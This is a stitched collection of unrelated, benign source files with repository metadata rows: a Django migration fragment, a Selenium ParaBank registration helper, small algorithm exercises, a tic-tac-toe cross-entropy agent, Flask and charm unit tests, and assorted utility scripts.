'latitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'longitude': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '8', 'decimal_places': '5', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Region']", 'null': 'True'}),
'search_names': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '4000', 'db_index': 'True', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
},
'cities_light.country': {
'Meta': {'object_name': 'Country'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'code2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'code3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '200'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'}),
'tld': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '5', 'blank': 'True'})
},
'cities_light.region': {
'Meta': {'unique_together': "(('country', 'name'),)", 'object_name': 'Region'},
'alternate_names': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cities_light.Country']"}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'geoname_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'null': 'True', 'blank': 'True'}),
'geoname_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_ascii': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '200', 'blank': 'True'}),
'slug': ('autoslug.fields.AutoSlugField', [], {'unique_with': '()', 'max_length': '50', 'populate_from': 'None'})
}
}
complete_apps = ['cities_light']
symmetrical = True
| [
"[email protected]"
] | |
7aaaf55396fa42efe3b6ca2c9c2de6dd06a030d0 | 95a6555114011d7ba9b0a842dd348dc4a18a56fc | /utils/register_user.py | f825ea8fd83e3071a42ff655b47e64950ed36251 | [
"Unlicense"
] | permissive | battyone/ParaBankSeleniumAutomation | c96dfdcb11591dd12db31b7ddd373326ce4284f7 | e28a886adba89b82a60831ad96a3a8f00f863116 | refs/heads/master | 2023-05-04T19:58:13.067568 | 2020-03-15T17:19:09 | 2020-03-15T17:19:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # Created by Egor Kostan.
# GitHub: https://github.com/ikostan
# LinkedIn: https://www.linkedin.com/in/egor-kostan/
import time
import allure
from utils.open_web_browser import open_web_browser
from page_object_models.register_page_model import RegisterPageModel
from expected_results.page_content.register_page_content import RegisterPageContent
from utils.step_definition import step_definition
def register_user(user, config):
'''
Registers a new user.
Does not check for any errors.
Using Selenium webdriver + chrome browser by default
:param page:
:param user:
:return:
'''
page_model = RegisterPageModel
page_context = RegisterPageContent
print("\nUser registration procedure...")
print("\n1. Open web browser...")
page = open_web_browser(config=config,
page_model=page_model,
page_content=page_context)
with allure.step("Fill out Register web form"):
print("\n2. Filling out user data...")
page.type_first_name(user.first_name)
page.type_last_name(user.last_name)
page.type_address(user.address)
page.type_city(user.city)
page.type_state(user.state)
page.type_zip_code(user.zip_code)
page.type_phone(user.phone)
page.type_ssn(user.ssn)
page.type_username(user.username)
page.type_password(user.password)
page.type_confirm(user.password)
with allure.step("Hit 'REGISTER' button"):
print("\n3. Hit 'REGISTER' button...")
page.hit_register_btn()
time.sleep(3)
with allure.step("Verify \"Welcome\" message"):
print('Verify "Welcome" message...')
expected = RegisterPageContent.WELCOME_MESSAGE['message']
actual = page.welcome_message
if expected == actual:
print("OK: Welcome message detected")
else:
print("ERROR: Welcome message does not appear")
with allure.step("Do Log Out"):
print("\n4. Do Log Out...")
page.hit_log_out_button()
time.sleep(3)
with allure.step("Close web browser"):
print("\n5. Close web browser...")
page.quit()
| [
"[email protected]"
] | |
28ee36dd6ff812fe4e277bd07efe81507c608c41 | 836d5f7190f6b4503e758c87c71598f18fdfce14 | /5-Döngüler/While-Döngüsü.py | 1ac3301b95952b419549dd7879fcf6fe5c4abac3 | [] | no_license | S-Oktay-Bicici/PYTHON-PROGRAMMING | cf452723fd3e7e8ec2aadc7980208d747c502e9a | 22e864f89544249d6309d6f4570a4104bf47346b | refs/heads/main | 2021-11-30T00:19:21.158084 | 2021-11-16T15:44:29 | 2021-11-16T15:44:29 | 316,716,147 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 425 | py |
############################################################
x = 0
while x <= 0:
print("doğru")
x += 1
print("x in değeri: ",x)
############################################################
a = 0
while a < 100:
a += 1
if a % 2 == 0:
print(a)
#############################################################
tr_harfler = "şçöğüİı"
a = 0
while a < len(tr_harfler):
print(tr_harfler[a], sep=" ")
a += 1
| [
"[email protected]"
] | |
561ae3faab88aca8acbdbe2023956a6b79a78cee | d40c743378c754b822bc42cfa7ede73792a31ede | /sales_by_march.py | a56fafb7ead4dc2b25d6515180e7eb7d8368db7d | [] | no_license | ShanjinurIslam/HackerRank | 85127527be319c3f1822c359a5831e4bcce25e8f | 38d77f2d0f56a6cec4bd544b347ee53d829dc715 | refs/heads/master | 2023-02-05T04:28:11.285169 | 2020-12-27T11:21:09 | 2020-12-27T11:21:09 | 320,749,069 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 627 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import defaultdict
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
hash_map = defaultdict(int)
for each in ar:
hash_map[each] += 1
total = 0
for each in hash_map.keys():
total += hash_map[each]//2
return total
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
n = int(input())
ar = list(map(int, input().rstrip().split()))
result = sockMerchant(n, ar)
fptr.write(str(result) + '\n')
fptr.close()
| [
"[email protected]"
] | |
a8b5085e4e8dbff770b58197257f4b8f7f0cdc50 | 5da5473ff3026165a47f98744bac82903cf008e0 | /packages/google-cloud-apigee-registry/samples/generated_samples/apigeeregistry_v1_generated_registry_get_artifact_sync.py | 0dbb7b9b471b59e7bc0cd633cdcb3a7389126fc1 | [
"Apache-2.0"
] | permissive | googleapis/google-cloud-python | ed61a5f03a476ab6053870f4da7bc5534e25558b | 93c4e63408c65129422f65217325f4e7d41f7edf | refs/heads/main | 2023-09-04T09:09:07.852632 | 2023-08-31T22:49:26 | 2023-08-31T22:49:26 | 16,316,451 | 2,792 | 917 | Apache-2.0 | 2023-09-14T21:45:18 | 2014-01-28T15:51:47 | Python | UTF-8 | Python | false | false | 1,845 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for GetArtifact
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-apigee-registry
# [START apigeeregistry_v1_generated_Registry_GetArtifact_sync]
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import apigee_registry_v1
def sample_get_artifact():
# Create a client
client = apigee_registry_v1.RegistryClient()
# Initialize request argument(s)
request = apigee_registry_v1.GetArtifactRequest(
name="name_value",
)
# Make the request
response = client.get_artifact(request=request)
# Handle the response
print(response)
# [END apigeeregistry_v1_generated_Registry_GetArtifact_sync]
| [
"[email protected]"
] | |
b4d9ec0b78a5f819546da52b89aaac8c78b7f8a7 | 21c1edbdb863158ed812031c6d63a40ba3bea31f | /simple/1_player/deep_crossentropy.py | bc72f2f610a42d5a302bebe5698aba4cc9692484 | [] | no_license | Ollitros/Tic-tac-toe | 22ebe26bc709f3c16210783b7411ee77c4df8aa7 | b551e1f60d8cbfc7167c057553dff897e34c7093 | refs/heads/master | 2020-03-29T22:00:53.037694 | 2019-05-01T17:02:09 | 2019-05-01T17:02:09 | 150,398,894 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,173 | py | from sklearn.neural_network import MLPClassifier
import numpy as np
import matplotlib.pyplot as plt
from tic_tac_toe.simple_tic_tac_toe import TicTacToe
def show_progress(batch_rewards, log, percentile, reward_range=[-990, +100]):
"""
A convenience function that displays training progress.
No cool math here, just charts.
"""
mean_reward, threshold = np.mean(batch_rewards), np.percentile(batch_rewards, percentile)
log.append([mean_reward, threshold])
print("mean reward = %.3f, threshold=%.3f" % (mean_reward, threshold))
plt.figure(figsize=[8, 4])
plt.subplot(1, 2, 1)
plt.plot(list(zip(*log))[0], label='Mean rewards')
plt.plot(list(zip(*log))[1], label='Reward thresholds')
plt.legend()
plt.grid()
plt.subplot(1, 2, 2)
plt.hist(batch_rewards, range=reward_range)
plt.vlines([np.percentile(batch_rewards, percentile)], [0], [100], label="percentile", color='red')
plt.legend()
plt.grid()
plt.show()
def select_elites(states_batch, actions_batch, rewards_batch, percentile=50):
"""
Select states and actions from games that have rewards >= percentile
:param states_batch: list of lists of states, states_batch[session_i][t]
:param actions_batch: list of lists of actions, actions_batch[session_i][t]
:param rewards_batch: list of rewards, rewards_batch[session_i][t]
:returns: elite_states,elite_actions, both 1D lists of states and respective actions from elite sessions
Please return elite states and actions in their original order
[i.e. sorted by session number and timestep within session]
If you're confused, see examples below. Please don't assume that states are integers (they'll get different later).
"""
reward_threshold = np.percentile(rewards_batch, percentile)
elite_states = [s for i in range(len(states_batch)) if rewards_batch[i] >= reward_threshold for s in
states_batch[i]]
elite_actions = [a for i in range(len(actions_batch)) if rewards_batch[i] >= reward_threshold for a in
actions_batch[i]]
return elite_states, elite_actions
def generate_session(t_max=1000):
states, actions = [], []
total_reward = 0
s = env.reset()
print("State-reset: ", s)
for t in range(t_max):
print("\nStep inside step - ", t)
# a vector of action probabilities in current state
probs = agent.predict_proba([s])[0]
print("Probs: ", probs)
a = np.random.choice(n_actions, 1, p=probs)[0]
print("Action:", a)
action = env.states
if action[a] == 1:
continue
new_s, r, done = env.step(a, 1)
# record sessions like you did before
states.append(s)
actions.append(a)
total_reward += r
s = new_s
print("new_state - ", new_s)
print("r = ", r)
if done:
break
return states, actions, total_reward
env = TicTacToe()
env.reset()
n_actions = env.n
print("Actions: \n", env.actions)
print("Total number of actions: ", n_actions)
agent = MLPClassifier(hidden_layer_sizes=(20, 20),
activation='tanh',
warm_start=True,
max_iter=1 #make only 1 iteration on each .fit(...)
)
# initialize agent to the dimension of state an amount of actions
print([env.reset()]*n_actions)
agent.fit([env.reset()]*n_actions, range(n_actions))
n_sessions = 100
percentile = 70
log = []
for i in range(50):
print('\n\n\n !!! STEP - ', i+1)
# generate new sessions
sessions = [generate_session() for i in range(n_sessions)]
batch_states, batch_actions, batch_rewards = map(np.array, zip(*sessions))
elite_states, elite_actions = select_elites(batch_states, batch_actions, batch_rewards, percentile)
# print(elite_states[:3])
# print(elite_actions[:3])
agent.fit(elite_states, elite_actions)
show_progress(batch_rewards, log, percentile, reward_range=[0, np.max(batch_rewards)])
if np.mean(batch_rewards) > 50:
print("You Win! You may stop training now via KeyboardInterrupt.")
| [
"[email protected]"
] | |
2f13a478783bf8420e554f05869dea7277b04405 | 44fc88370e7dd01aab918aa797983c5051f4147e | /Controllers/TestThread.py | eb4dc07460106b86c8a16d0ffce941059358f7c6 | [] | no_license | Sispheor/PiHomeAlone | 1f1a9aa619b97483a61972b58094c6cec961161a | 7356adddc0e936b8c8f6bd45813ec012196edefd | refs/heads/master | 2021-01-15T16:57:20.813213 | 2016-08-31T20:14:02 | 2016-08-31T20:14:02 | 64,602,755 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 369 | py | import threading
class TestThread(threading.Thread):
def __init__(self, shared_queue):
super(TestThread, self).__init__()
self.shared_queue = shared_queue
def run(self):
print "Run test thread"
while True:
if not self.shared_queue.empty():
val = self.shared_queue.get()
print val
| [
"[email protected]"
] | |
fa320868ae9bf5f750b0b8459e690b5b188e5164 | 82c4d0e905bf28fecbad33274cc5aac9c1bdde99 | /thinger.py | 813ac23fd871fce607528cb066dc481b2a5a7e83 | [] | no_license | dansgithubuser/py-rpc-host | aac578d9410a056a7751c6eae648d924fa4a3a2d | e4d19e02e427784e21cf267692539523f034d8f9 | refs/heads/master | 2020-05-18T03:03:52.661094 | 2020-02-07T23:30:51 | 2020-02-07T23:36:22 | 184,135,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13 | py | blinger = 24
| [
"[email protected]"
] | |
a3e1e62573d08a5efcf9b3c114322ce3211071fb | 4e23ff457c737886d3f1280162b90987bbc12211 | /main/apps/carts/migrations/0003_auto_20190120_0337.py | bd278830f6b8cdc994bdb5beb3c617c35c70510e | [] | no_license | ehoversten/Ecommerce_Django | 8ab1edeb1b7ed2a0e9f33920ecccc2d6b1996cd9 | b109b62e2fd318c4feb37c448898cbeada722968 | refs/heads/master | 2022-12-21T09:42:53.317891 | 2019-02-14T16:24:00 | 2019-02-14T16:24:00 | 143,313,907 | 6 | 2 | null | 2022-11-22T02:34:42 | 2018-08-02T15:34:32 | Python | UTF-8 | Python | false | false | 660 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-01-20 03:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carts', '0002_cart_subtotal'),
]
operations = [
migrations.AlterField(
model_name='cart',
name='subtotal',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
migrations.AlterField(
model_name='cart',
name='total',
field=models.DecimalField(decimal_places=2, default=0.0, max_digits=10),
),
]
| [
"[email protected]"
] | |
c40022197521b3fda780acbc6aeb293021154248 | fa1eb33b885bd03a56a542720c4f823654457bd5 | /tests/test_image_search.py | b4169a9b82cd7fb74be11c9f5050def5e6b7800c | [] | no_license | jhoover4/fcc-api-projects | 16753435017518c0594db9ead3606691280fadc4 | b21f830c0f1047e0cb28f71387de4581cd4be523 | refs/heads/master | 2022-12-11T03:44:22.103645 | 2018-12-26T19:24:13 | 2018-12-26T19:25:52 | 118,831,587 | 0 | 0 | null | 2022-12-08T01:26:31 | 2018-01-24T22:44:09 | Python | UTF-8 | Python | false | false | 2,433 | py | import datetime
import json
import unittest
from test_app import BaseTestCase
import models
class TestImageSearchView(BaseTestCase, unittest.TestCase):
def test_check_table(self):
assert models.ImageSearch.table_exists()
def test_index(self):
"""Test that the description view for this api is running."""
url = self.app.get('/image-search')
self.assertTrue(url.data)
self.assertEqual(url.status_code, 200)
class TestImageSearchApi(BaseTestCase, unittest.TestCase):
def setUp(self):
super().setUp()
self.search_record = models.ImageSearch.create(search_query='cats')
def test_new_search(self):
"""Test search is performed correctly and returns json data."""
response = self.app.get('/api/image-search/cats')
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_search_offset(self):
"""Test search is performed correctly with offset parameter"""
response = self.app.get('/api/image-search/cats')
offset_response = self.app.get('/api/image-search/cats', query_string={'offset': 15})
self.assertEqual(offset_response.status_code, 200)
self.assertNotEqual(offset_response.json[0]['formattedUrl'], response.json[0]['formattedUrl'])
def test_new_query_in_args(self):
"""Test search is performed with query in parameters."""
response = self.app.get('/api/image-search', query_string={'query': 'cats'})
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json[0]['displayLink'])
def test_new_query_in_args_empty(self):
"""Test error is thrown if query not in url at all."""
response = self.app.get('/api/image-search')
self.assertEqual(response.status_code, 400)
self.assertEqual(json.loads(response.data), {
'message': 'Query is required.'
})
def test_recent_searches(self):
"""Test all searches are returned on GET."""
response = self.app.get('/api/image-search/recent')
expected_data = [{
'query': self.search_record.search_query,
'when': datetime.datetime.strftime(self.search_record.created_at, '%a, %d %b %Y %X -0000')
}]
self.assertEqual(response.status_code, 200)
self.assertEqual(json.loads(response.data), expected_data)
| [
"[email protected]"
] | |
c253640dbc26eb41517006f2f80be5e9f19b2aaf | 2e9748e6dc278a5a84184216d94ab2c841ec8482 | /image_process/opencv/noise_remove_inpaint/main.py | 17a39c66a3aa56f6b191aaa81377d6ade7690a95 | [
"MIT"
] | permissive | ybdesire/machinelearning | fa2bc20240e88513475358c761d067108e1eadf8 | 0224746332e1085336e0b02e0ca3b11d74bd9a91 | refs/heads/master | 2021-12-08T04:46:56.344543 | 2021-11-19T07:57:47 | 2021-11-19T07:57:47 | 54,877,464 | 30 | 19 | null | 2021-08-13T01:23:08 | 2016-03-28T08:16:06 | Jupyter Notebook | UTF-8 | Python | false | false | 208 | py | import numpy as np
import cv2 as cv
img = cv.imread('messi.png')
mask = cv.imread('mask.png',0)
dst = cv.inpaint(img,mask,3,cv.INPAINT_TELEA)
cv.imshow('dst',dst)
cv.waitKey(0)
cv.destroyAllWindows()
| [
"[email protected]"
] | |
129f9191f2f84ac88110b03e3dcf1e00a852b049 | 3c92c3f633b613a62fb67476fd617e1140133880 | /leetcode/605. Can Place Flowers.py | db797a8c9e9dcebc16f5082e85a622b0163ba516 | [] | no_license | cuiy0006/Algorithms | 2787f36f8164ded5252a006f723b570c9091bee9 | 00fd1397b65c68a303fcf963db3e28cd35c1c003 | refs/heads/master | 2023-03-31T13:55:59.191857 | 2023-03-31T03:39:42 | 2023-03-31T03:39:42 | 75,001,651 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | class Solution:
def canPlaceFlowers(self, flowerbed: List[int], n: int) -> bool:
if n == 0:
return True
for i, plot in enumerate(flowerbed):
if plot == 1:
continue
if (i == 0 or flowerbed[i - 1] == 0) and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0):
flowerbed[i] = 1
n -= 1
if n == 0:
return True
return False
| [
"[email protected]"
] | |
757c41f50ce3426d0abb28b4e32a9f738da56736 | 6573a45c4389688666821621c26a5a95a0765e4d | /archived_envs/20190625_100746/bin/iptest2 | 6e74f0fe49439610cf8c38536be2e444eeba223e | [] | no_license | ilhmndn/Warehouse-Management-System-With-Frappe | 66a41be2286dbdb556ab51a4788fc42987d6ed2e | bd9864c5a04a6e2f2f625a8755fba3df4b6409be | refs/heads/master | 2022-10-23T11:13:57.810948 | 2019-07-02T05:18:19 | 2019-07-02T05:18:19 | 194,467,571 | 2 | 2 | null | 2022-10-15T16:16:10 | 2019-06-30T02:40:05 | Python | UTF-8 | Python | false | false | 262 | #!/home/ilhmndn/frappe-training/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from IPython.testing.iptestcontroller import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
f68d2ca23b8e9660445df4f664adf81a10a1b580 | dd6a3615d54ca825051f1c9f81bcd206eb9cfd10 | /setup.py | 91bcc6ec95068bd0fb034196004e350c1d121a19 | [
"MIT"
] | permissive | cherakhan/mps | 82e06aea229b2047bf1be68c4430fad621189abf | 2ba818c361e467841f6bbe0ef47a1e833ef315d3 | refs/heads/master | 2022-02-01T20:40:07.327357 | 2019-06-10T03:43:49 | 2019-06-10T03:43:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/env python
import os
from setuptools import find_packages
with open('README.md', 'r') as f:
LONG_DESCRIPTION = f.read()
from numpy.distutils.core import setup, Extension
setup_options = dict(
name='doe-mps',
version="0.1.1",
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url='https://github.com/kirthevasank/mps/',
license='MIT',
author_email='[email protected]',
packages=['mps', 'mps.exd', 'mps.policies', 'mps.utils', 'mps.prob'],
install_requires=[
'future',
'numpy',
'scipy',
'six',
],
classifiers=[
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: MacOS",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX :: Linux",
"Operating System :: Unix",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
],
)
setup(**setup_options)
| [
"[email protected]"
] | |
d2fb24dfd527c8ee0ac66cd54930611e44b3d5c6 | 34652a47355a8dbe9200db229a1bbc62619de364 | /Maths/diff_eqns/Runge_Kutta_method_2.py | 98e189db514dbf1126d73f217e5d7515b190d817 | [] | no_license | btrif/Python_dev_repo | df34ab7066eab662a5c11467d390e067ab5bf0f8 | b4c81010a1476721cabc2621b17d92fead9314b4 | refs/heads/master | 2020-04-02T13:34:11.655162 | 2019-11-10T11:08:23 | 2019-11-10T11:08:23 | 154,487,015 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | def rKN(x, fx, n, hs):
k1 = []
k2 = []
k3 = []
k4 = []
xk = []
for i in range(n):
k1.append(fx[i](x)*hs)
for i in range(n):
xk.append(x[i] + k1[i]*0.5)
for i in range(n):
k2.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k2[i]*0.5
for i in range(n):
k3.append(fx[i](xk)*hs)
for i in range(n):
xk[i] = x[i] + k3[i]
for i in range(n):
k4.append(fx[i](xk)*hs)
for i in range(n):
x[i] = x[i] + (k1[i] + 2*(k2[i] + k3[i]) + k4[i])/6
return x
def fa1(x):
return 0.9*(1 - x[1]*x[1])*x[0] - x[1] + math.sin(x[2])
def fb1(x):
return x[0]
def fc1(x):
return 0.5
def VDP1():
f = [fa1, fb1, fc1]
x = [1, 1, 0]
hs = 0.05
for i in range(20000):
x = rKN(x, f, 3, hs)
def rK3(a, b, c, fa, fb, fc, hs):
a1 = fa(a, b, c)*hs
b1 = fb(a, b, c)*hs
c1 = fc(a, b, c)*hs
ak = a + a1*0.5
bk = b + b1*0.5
ck = c + c1*0.5
a2 = fa(ak, bk, ck)*hs
b2 = fb(ak, bk, ck)*hs
c2 = fc(ak, bk, ck)*hs
ak = a + a2*0.5
bk = b + b2*0.5
ck = c + c2*0.5
a3 = fa(ak, bk, ck)*hs
b3 = fb(ak, bk, ck)*hs
c3 = fc(ak, bk, ck)*hs
ak = a + a3
bk = b + b3
ck = c + c3
a4 = fa(ak, bk, ck)*hs
b4 = fb(ak, bk, ck)*hs
c4 = fc(ak, bk, ck)*hs
a = a + (a1 + 2*(a2 + a3) + a4)/6
b = b + (b1 + 2*(b2 + b3) + b4)/6
c = c + (c1 + 2*(c2 + c3) + c4)/6
return a, b, c
def fa2(a, b, c):
return 0.9*(1 - b*b)*a - b + math.sin(c)
def fb2(a, b, c):
return a
def fc2(a, b, c):
return 0.5
def VDP2():
a, b, c, hs = 1, 1, 0, 0.05
for i in range(20000):
a, b, c = rK3(a, b, c, fa2, fb2, fc2, hs) | [
"[email protected]"
] | |
ce033b921042d603ac116dcbe76a4c8e40f95ad7 | a227947112fe8a3fd8078bcdfee22b82385f5490 | /aat/config/enums.py | 25fa292208b39967d8415ad9fd63dbece71a9fc3 | [
"Apache-2.0"
] | permissive | Sahanduiuc/aat-1 | 43465f6060d084a5442af8685266e0cd009a8626 | 0aee0f9943b5e16f29ec69faea5f9e5a937c5e5d | refs/heads/master | 2022-11-15T21:16:28.580803 | 2020-06-14T22:14:37 | 2020-06-14T22:14:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,036 | py | from enum import Enum
class BaseEnum(Enum):
def __str__(self):
return f'{self.value}'
class Side(BaseEnum):
BUY = 'BUY'
SELL = 'SELL'
class EventType(BaseEnum):
# Trade events
TRADE = 'TRADE'
# Order events
OPEN = 'OPEN'
CANCEL = 'CANCEL'
CHANGE = 'CHANGE'
FILL = 'FILL'
# Other data events
DATA = 'DATA'
# System events
HALT = 'HALT'
CONTINUE = 'CONTINUE'
# Engine events
ERROR = 'ERROR'
START = 'START'
EXIT = 'EXIT'
class DataType(BaseEnum):
ORDER = 'ORDER'
TRADE = 'TRADE'
class InstrumentType(BaseEnum):
CURRENCY = 'CURRENCY'
# PAIR = 'PAIR'
EQUITY = 'EQUITY'
# BOND = 'BOND'
# OPTION = 'OPTION'
# FUTURE = 'FUTURE'
class OrderType(BaseEnum):
# Order Types
LIMIT = 'LIMIT'
MARKET = 'MARKET'
STOP = 'STOP'
class OrderFlag(BaseEnum):
# Order Flag
NONE = 'NONE'
FILL_OR_KILL = 'FILL_OR_KILL'
ALL_OR_NONE = 'ALL_OR_NONE'
IMMEDIATE_OR_CANCEL = 'IMMEDIATE_OR_CANCEL'
| [
"[email protected]"
] | |
a41229319392a641d67d38fb9bac9372fa60c208 | 731951e8b75b45f427d44ecbae7b1a3445dcce33 | /unit_tests/test_designate_handlers.py | b93acf70ae1ddbce0ffd2204016a2eb333959926 | [
"Apache-2.0"
] | permissive | falfaro/charm-designate | 096eccce95d2d2f360afd7ee92f9b33cef990fbb | 385e4cf8cd1da1a02df5f6e8981b41c0c8e9a2bb | refs/heads/master | 2020-12-31T00:30:33.345747 | 2017-03-29T07:20:31 | 2017-03-29T07:20:31 | 86,549,157 | 0 | 0 | null | 2017-03-29T07:02:16 | 2017-03-29T07:02:16 | null | UTF-8 | Python | false | false | 9,051 | py | from __future__ import absolute_import
from __future__ import print_function
import unittest
import mock
import reactive.designate_handlers as handlers
_when_args = {}
_when_not_args = {}
def mock_hook_factory(d):
def mock_hook(*args, **kwargs):
def inner(f):
# remember what we were passed. Note that we can't actually
# determine the class we're attached to, as the decorator only gets
# the function.
try:
d[f.__name__].append(dict(args=args, kwargs=kwargs))
except KeyError:
d[f.__name__] = [dict(args=args, kwargs=kwargs)]
return f
return inner
return mock_hook
class TestDesignateHandlers(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._patched_when = mock.patch('charms.reactive.when',
mock_hook_factory(_when_args))
cls._patched_when_started = cls._patched_when.start()
cls._patched_when_not = mock.patch('charms.reactive.when_not',
mock_hook_factory(_when_not_args))
cls._patched_when_not_started = cls._patched_when_not.start()
# force requires to rerun the mock_hook decorator:
# try except is Python2/Python3 compatibility as Python3 has moved
# reload to importlib.
try:
reload(handlers)
except NameError:
import importlib
importlib.reload(handlers)
@classmethod
def tearDownClass(cls):
cls._patched_when.stop()
cls._patched_when_started = None
cls._patched_when = None
cls._patched_when_not.stop()
cls._patched_when_not_started = None
cls._patched_when_not = None
# and fix any breakage we did to the module
try:
reload(handlers)
except NameError:
import importlib
importlib.reload(handlers)
def setUp(self):
self._patches = {}
self._patches_start = {}
def tearDown(self):
for k, v in self._patches.items():
v.stop()
setattr(self, k, None)
self._patches = None
self._patches_start = None
def patch(self, obj, attr, return_value=None):
mocked = mock.patch.object(obj, attr)
self._patches[attr] = mocked
started = mocked.start()
started.return_value = return_value
self._patches_start[attr] = started
setattr(self, attr, started)
def test_registered_hooks(self):
# test that the hooks actually registered the relation expressions that
# are meaningful for this interface: this is to handle regressions.
# The keys are the function names that the hook attaches to.
all_interfaces = (
'dns-backend.available',
'shared-db.available',
'identity-service.available',
'amqp.available')
when_patterns = {
'setup_amqp_req': [('amqp.connected', )],
'setup_database': [('shared-db.connected', )],
'setup_endpoint': [('identity-service.connected', )],
'configure_ssl': [('identity-service.available', )],
'update_peers': [('cluster.available', )],
'config_changed': [('config.changed', )],
'cluster_connected': [('ha.connected', )],
'create_servers_and_domains': [
all_interfaces,
('base-config.rendered', ),
('db.synched', ),
],
'configure_designate_full': [
all_interfaces,
('db.synched', ),
],
'run_db_migration': [
all_interfaces,
('base-config.rendered', ),
],
'configure_designate_basic': [
all_interfaces,
],
}
when_not_patterns = {
'install_packages': [('installed', )],
'run_db_migration': [('db.synched', )],
'configure_designate_basic': [('base-config.rendered', )],
'create_servers_and_domains': [('domains.created', )],
}
# check the when hooks are attached to the expected functions
for t, p in [(_when_args, when_patterns),
(_when_not_args, when_not_patterns)]:
for f, args in t.items():
# check that function is in patterns
print(f)
self.assertTrue(f in p.keys())
# check that the lists are equal
l = [a['args'] for a in args]
self.assertEqual(l, p[f])
def test_install_packages(self):
self.patch(handlers.designate, 'install')
self.patch(handlers.reactive, 'set_state')
handlers.install_packages()
self.install.assert_called_once_with()
self.set_state.assert_called_once_with('installed')
def test_setup_amqp_req(self):
self.patch(handlers.designate, 'assess_status')
amqp = mock.MagicMock()
handlers.setup_amqp_req(amqp)
amqp.request_access.assert_called_once_with(
username='designate', vhost='openstack')
self.assess_status.assert_called_once_with()
def test_database(self):
self.patch(handlers.designate, 'assess_status')
database = mock.MagicMock()
handlers.setup_database(database)
calls = [
